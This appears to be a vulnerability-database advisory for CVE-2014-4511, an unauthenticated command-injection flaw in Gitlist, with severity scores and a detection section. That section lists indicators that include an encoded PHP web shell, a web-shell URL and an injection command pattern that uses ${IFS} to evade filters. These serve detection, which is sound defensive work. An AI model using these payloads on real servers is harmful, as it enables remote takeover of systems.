CVE-2014-4511
published 2014-07-22


Priority: P2 75
Severity: high, 7.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 82.73% (99.6th percentile)
Gitlist before 0.5.0 allows remote attackers to execute arbitrary commands via shell metacharacters in the file name in the URI of a request for a (1) blame, (2) file, or (3) stats page, as demonstrated by requests to blame/master/, master/, and stats/master/.

Affected

4 ranges

Vendor  | Product | Version range | Fixed in
gitlist | gitlist | <= 0.4.0      |
gitlist | gitlist |               |
gitlist | gitlist |               |
gitlist | gitlist |               |

Detection & IOCs (extracted from sources)

path: /blame/master/
path: /stats/master/
filename: x.php
url: /cache/x.php?cmd=ls
other: PD9zeXN0ZW0oJF9HRVRbJ2NtZCddKTs/Pgo=
command: echo${IFS}<base64_payload>|base64${IFS}--decode
  • The exploit requires no authentication; there are no credentials or session tokens to filter on, so detection must rely entirely on URI pattern matching.
  • The payload space is limited to 8192 bytes (max GET request length) and bad characters include '&' and space (0x20), so payloads use ${IFS} as a space substitute; detection should account for this evasion.